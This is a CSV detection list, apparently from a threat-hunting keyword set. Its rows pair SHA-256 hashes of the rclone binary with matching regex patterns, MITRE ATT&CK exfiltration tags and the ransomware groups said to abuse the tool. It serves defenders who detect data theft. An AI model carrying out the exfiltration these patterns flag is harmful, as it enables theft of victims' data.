"*1b38c8d5050c47dd6902d8da4b230d832e144d56f2a49affac2185f854223fe1*",".{0,1000}1b38c8d5050c47dd6902d8da4b230d832e144d56f2a49affac2185f854223fe1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1b746db0162248f56dd364a85ff35482f0c8dba3b45f42ed769f8592f0061af3*",".{0,1000}1b746db0162248f56dd364a85ff35482f0c8dba3b45f42ed769f8592f0061af3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1c0511142beb4a6036d9e1915787354e97716a0c72f9aa4c7158ed39fa1542b7*",".{0,1000}1c0511142beb4a6036d9e1915787354e97716a0c72f9aa4c7158ed39fa1542b7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1c89af499e9d81c3ee2af8fa74a88414c22657c3df439f4d812e803bff5671cd*",".{0,1000}1c89af499e9d81c3ee2af8fa74a88414c22657c3df439f4d812e803bff5671cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1d1fc4833ed95176f590d34e7d43176a20d0ba1aea6791c291808bc95d190f29*",".{0,1000}1d1fc4833ed95176f590d34e7d43176a20d0ba1aea6791c291808bc95d190f29.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1d72abe57369b5731e21252804dea61820c6e2a2ba89d0ce0f39d1253314ba3c*",".{0,1000}1d72abe57369b5731e21252804dea61820c6e2a2ba89d0ce0f39d1253314ba3c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1d7e79f1d90d5cd47d64478cc1b3cb0bcf3fa5ff3da30367825ce1fc9f209214*",".{0,1000}1d7e79f1d90d5cd47d64478cc1b3cb0bcf3fa5ff3da30367825ce1fc9f209214.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1d8e435a1cd0df78492aabd0dc9da9ae977ef0364c53b9253a06796d72f030e7*",".{0,1000}1d8e435a1cd0df78492aabd0dc9da9ae977ef0364c53b9253a06796d72f030e7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1d975d20bfb5aae07aed840f2af54cafc9281b0f3d4310287413cae69e3b983a*",".{0,1000}1d975d20bfb5aae07aed840f2af54cafc9281b0f3d4310287413cae69e3b983a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1dce9f399e4ac4a1deebc00de3dc11e880a5299ab933df9a4b9d7ce3aeffb20d*",".{0,1000}1dce9f399e4ac4a1deebc00de3dc11e880a5299ab933df9a4b9d7ce3aeffb20d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1df9cc0aac82013ab4387860bc1059df19f585868fdcc73f1a7bae3b5cc5c78b*",".{0,1000}1df9cc0aac82013ab4387860bc1059df19f585868fdcc73f1a7bae3b5cc5c78b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1e65d6a9229388b032dc9691eb041c922e133a1a6f35b9665dfd0457273da334*",".{0,1000}1e65d6a9229388b032dc9691eb041c922e133a1a6f35b9665dfd0457273da334.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1e974e0245f99c767e45bfc1568a8451a044beb70b8c4cdf4845467395943856*",".{0,1000}1e974e0245f99c767e45bfc1568a8451a044beb70b8c4cdf4845467395943856.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1ed2f132aaeb3c4d7422ff41944a9e8fecfbf0efcd2cdd58356dc80181a9745e*",".{0,1000}1ed2f132aaeb3c4d7422ff41944a9e8fecfbf0efcd2cdd58356dc80181a9745e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1f180d755994e8a501463d1255c019376b13720e9b970f3da5d08007335726c0*",".{0,1000}1f180d755994e8a501463d1255c019376b13720e9b970f3da5d08007335726c0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1f4453ac0f49d134dfa05b10ea4e3aa159c7fad7f8639a707c0678c04309d54b*",".{0,1000}1f4453ac0f49d134dfa05b10ea4e3aa159c7fad7f8639a707c0678c04309d54b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1f6b524a6a041b1fd96e570530c629756a886033ce50cd336b7eab1cea955019*",".{0,1000}1f6b524a6a041b1fd96e570530c629756a886033ce50cd336b7eab1cea955019.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1fa94229b3c6f5c9a7eb56af8e57e2e47b654770934976115dd918d50487a1e1*",".{0,1000}1fa94229b3c6f5c9a7eb56af8e57e2e47b654770934976115dd918d50487a1e1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1fb29637f484c581618b37fd321d3664fe52602d5c9bfef9d2c3acee8a5afdae*",".{0,1000}1fb29637f484c581618b37fd321d3664fe52602d5c9bfef9d2c3acee8a5afdae.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*20354177c2ba7a7695f6a97a645b22834ee4e0a530717e9b787886d4f61fc291*",".{0,1000}20354177c2ba7a7695f6a97a645b22834ee4e0a530717e9b787886d4f61fc291.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2133a91f7cc4d3d456727a8004db0268c2dc8cc373886124e89d8bd743a18843*",".{0,1000}2133a91f7cc4d3d456727a8004db0268c2dc8cc373886124e89d8bd743a18843.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2145cc53cfb47b26f038302b3e3a9125da9bc728f365abb4ba59dc463ab4f579*",".{0,1000}2145cc53cfb47b26f038302b3e3a9125da9bc728f365abb4ba59dc463ab4f579.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2155ea2c225272a6f78b2aa4547bb587c40b007586e73b41b31c59edba64f8fe*",".{0,1000}2155ea2c225272a6f78b2aa4547bb587c40b007586e73b41b31c59edba64f8fe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2166a2076b45e113e1a90de8fe376491186847680eeea1f1c83a5743607ead26*",".{0,1000}2166a2076b45e113e1a90de8fe376491186847680eeea1f1c83a5743607ead26.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*223931256f38c5faffe9402892e379b47f9442189325dc35a8a58f83ac2d4d90*",".{0,1000}223931256f38c5faffe9402892e379b47f9442189325dc35a8a58f83ac2d4d90.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2249bab380b8772c79a3f47caf4f0538e11c8e10acdc13c5292033fc403b10e9*",".{0,1000}2249bab380b8772c79a3f47caf4f0538e11c8e10acdc13c5292033fc403b10e9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2261b96a6bd64788c498d0cd1e6a327f169a0092972dd3bbbb2ff2251ab78252*",".{0,1000}2261b96a6bd64788c498d0cd1e6a327f169a0092972dd3bbbb2ff2251ab78252.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*22bc4b6ddd64fa969a6181db315429b46f528f88152d90ae4f27efc46791cad7*",".{0,1000}22bc4b6ddd64fa969a6181db315429b46f528f88152d90ae4f27efc46791cad7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*22dec13f1013b2da0ec52eefe16d35ab027a29ea82c596154714c331ef01453f*",".{0,1000}22dec13f1013b2da0ec52eefe16d35ab027a29ea82c596154714c331ef01453f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2330295df8b6f96d0a7e962c7b4779f9e5b52bd9b99b289aa1395aaf96e8ae5a*",".{0,1000}2330295df8b6f96d0a7e962c7b4779f9e5b52bd9b99b289aa1395aaf96e8ae5a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*23c1ff369e0adee0fa061ef44e5c75ff137e859ccba280354283016faa469e3f*",".{0,1000}23c1ff369e0adee0fa061ef44e5c75ff137e859ccba280354283016faa469e3f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*23ce78bdc640ea91a0a6c48688a41bfad3c3b62f85ecdd83cab3680c66b16853*",".{0,1000}23ce78bdc640ea91a0a6c48688a41bfad3c3b62f85ecdd83cab3680c66b16853.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*247a566f09408932d929191a08f7ab02efa583f92834823336ac9983c727026a*",".{0,1000}247a566f09408932d929191a08f7ab02efa583f92834823336ac9983c727026a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*24affae5bf7188361d794c1a44445d719c3b7a511d69ba1e29f6cf7c97850030*",".{0,1000}24affae5bf7188361d794c1a44445d719c3b7a511d69ba1e29f6cf7c97850030.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*24c4dba637f3db20f8975eb696064b95f1f2689aab8b7849b51d2544e3b81c5c*",".{0,1000}24c4dba637f3db20f8975eb696064b95f1f2689aab8b7849b51d2544e3b81c5c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*24cde0c118655d52ebccd55ad7656a24fc346b6a05d3914ab116235b5726ca5f*",".{0,1000}24cde0c118655d52ebccd55ad7656a24fc346b6a05d3914ab116235b5726ca5f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
